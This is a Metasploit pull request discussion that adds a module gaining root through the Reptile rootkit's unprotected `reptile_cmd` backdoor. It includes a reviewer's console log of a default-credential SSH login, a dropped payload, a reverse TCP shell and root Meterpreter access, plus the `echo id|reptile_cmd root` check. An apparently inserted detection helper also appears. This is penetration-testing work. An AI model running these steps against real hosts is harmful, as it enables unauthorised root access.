
Add Reptile Rootkit reptile_cmd Privilege Escalation #12701

Merged (1 commit, Dec 21, 2019)

Conversation

@bcoles bcoles commented Dec 11, 2019

Add Reptile Rootkit reptile_cmd Privilege Escalation.

    This module uses Reptile rootkit's `reptile_cmd` backdoor executable
    to gain root privileges using the `root` command.

    This module has been tested successfully with Reptile from `master`
    branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).

@bcoles bcoles commented Dec 11, 2019

This implementation is not particularly stealthy. It drops a payload to disk, and doesn't take advantage of any of Reptile's features, beyond simply leveraging reptile_cmd to elevate privileges.

The value of this module is largely derived from the check method. The reptile_cmd utility is not password protected, so offers a trivial avenue to root, regardless of who installed it. If the rootkit has been installed to the default directory (/reptile), then this module can also be leveraged by post/multi/recon/local_exploit_suggester to scan a host for Reptile while performing other privesc checks.
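As an added example (not the module's code, and not Reptile's), the following Ruby helper encodes the two facts the check relies on from the host-inspection side: Reptile's default install directory `/reptile` holding `reptile_cmd`, and the difference between the "You have no power here!" refusal and a `uid=0` result when `id` is passed through `reptile_cmd root`. The module name, method names and sample strings are my own; it never executes `reptile_cmd`, it only looks for the file and classifies captured output.

```ruby
require 'fileutils'
require 'tmpdir'

# Hypothetical helper (not the Metasploit module): records whether a host
# carries Reptile's default install and what reptile_cmd answered.
module ReptileCheck
  DEFAULT_DIR = 'reptile'.freeze      # Reptile's default install dir, /reptile
  CMD_NAME    = 'reptile_cmd'.freeze
  DENIED_MSG  = 'You have no power here!'.freeze

  # Path to reptile_cmd under +root+ (a parameter so the check can be pointed
  # at a mounted disk image or a test tree), or nil when it is absent.
  def self.find_reptile_cmd(root = '/')
    path = File.join(root, DEFAULT_DIR, CMD_NAME)
    File.file?(path) ? path : nil
  end

  # Classify the output of `echo id | reptile_cmd root`:
  #   :safe       - reptile_cmd refused, so the kernel module is not active
  #   :vulnerable - `id` ran as uid=0, so any local user can become root
  #   :unknown    - anything else (helper missing, garbled output, ...)
  def self.classify_output(output)
    text = output.to_s.strip
    return :safe       if text.include?(DENIED_MSG)
    return :vulnerable if text.match?(/\buid=0\b/)
    :unknown
  end

  # Summary hash as an inventory or scanning job would store it; +output+ is
  # nil when the command was not run (e.g. reptile_cmd was not found).
  def self.report(root: '/', output: nil)
    path = find_reptile_cmd(root)
    {
      reptile_cmd: path,
      installed:   !path.nil?,
      status:      output.nil? ? :not_run : classify_output(output)
    }
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed sample: a throwaway tree with the default layout; no command is run.
  Dir.mktmpdir do |root|
    FileUtils.mkdir_p(File.join(root, ReptileCheck::DEFAULT_DIR))
    FileUtils.touch(File.join(root, ReptileCheck::DEFAULT_DIR, ReptileCheck::CMD_NAME))
    p ReptileCheck.report(root: root, output: 'uid=0(root) gid=0(root)')
  end
  p ReptileCheck.classify_output('You have no power here! :(')   # :safe
end
```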

@h00die h00die self-assigned this Dec 21, 2019
@h00die h00die commented Dec 21, 2019

Working for me, will check through the PR later, get this landed today

```
msf5 auxiliary(scanner/ssh/ssh_login) > run

[+] 2.2.2.2:22 - Success: 'ubuntu:ubuntu' ''
[*] Command shell session 1 opened (1.1.1.1:37937 -> 2.2.2.2:22) at 2019-12-21 07:55:28 -0500
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/ssh/ssh_login) > use exploit/linux/local/reptile_rootkit_reptile_cmd_priv_esc
msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > set session 1
session => 1
msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > check

[!] SESSION may not be compatible with this module.
[+] The target is vulnerable.
msf5 exploit(linux/local/reptile_rootkit_reptile_cmd_priv_esc) > run

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 1.1.1.1:4444
[*] Writing '/tmp/.BF9f4W2hW1p' (207 bytes) ...
[*] Executing payload...
[*] Sending stage (985320 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:43474) at 2019-12-21 07:56:07 -0500

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```

```ruby
res = cmd_exec("echo id|#{reptile_cmd_path} root").to_s.strip
vprint_status "Output: #{res}"

if res.include?('You have no power here!')
```
@h00die h00die commented Dec 21, 2019

As assumed, code looks good, it's trivial at its most difficult, so going to go ahead and land!

@h00die h00die merged commit 1ebfe6c into rapid7:master Dec 21, 2019
3 checks passed
@h00die h00die commented Dec 21, 2019

Release Notes

This adds a local privilege escalation against a host which has the Reptile Linux rootkit installed.

@h00die h00die commented Dec 21, 2019

Why do I get the strange feeling there are a few more of these you have lined up to add :)

@bcoles bcoles deleted the reptile_rootkit_reptile_cmd_priv_esc branch Dec 21, 2019
@tperry-r7 tperry-r7 added the rn-modules label Jan 14, 2020
@bcoles bcoles commented Feb 16, 2020

> Why do I get the strange feeling there are a few more of these you have lined up to add :)

<_< ( #12942 )
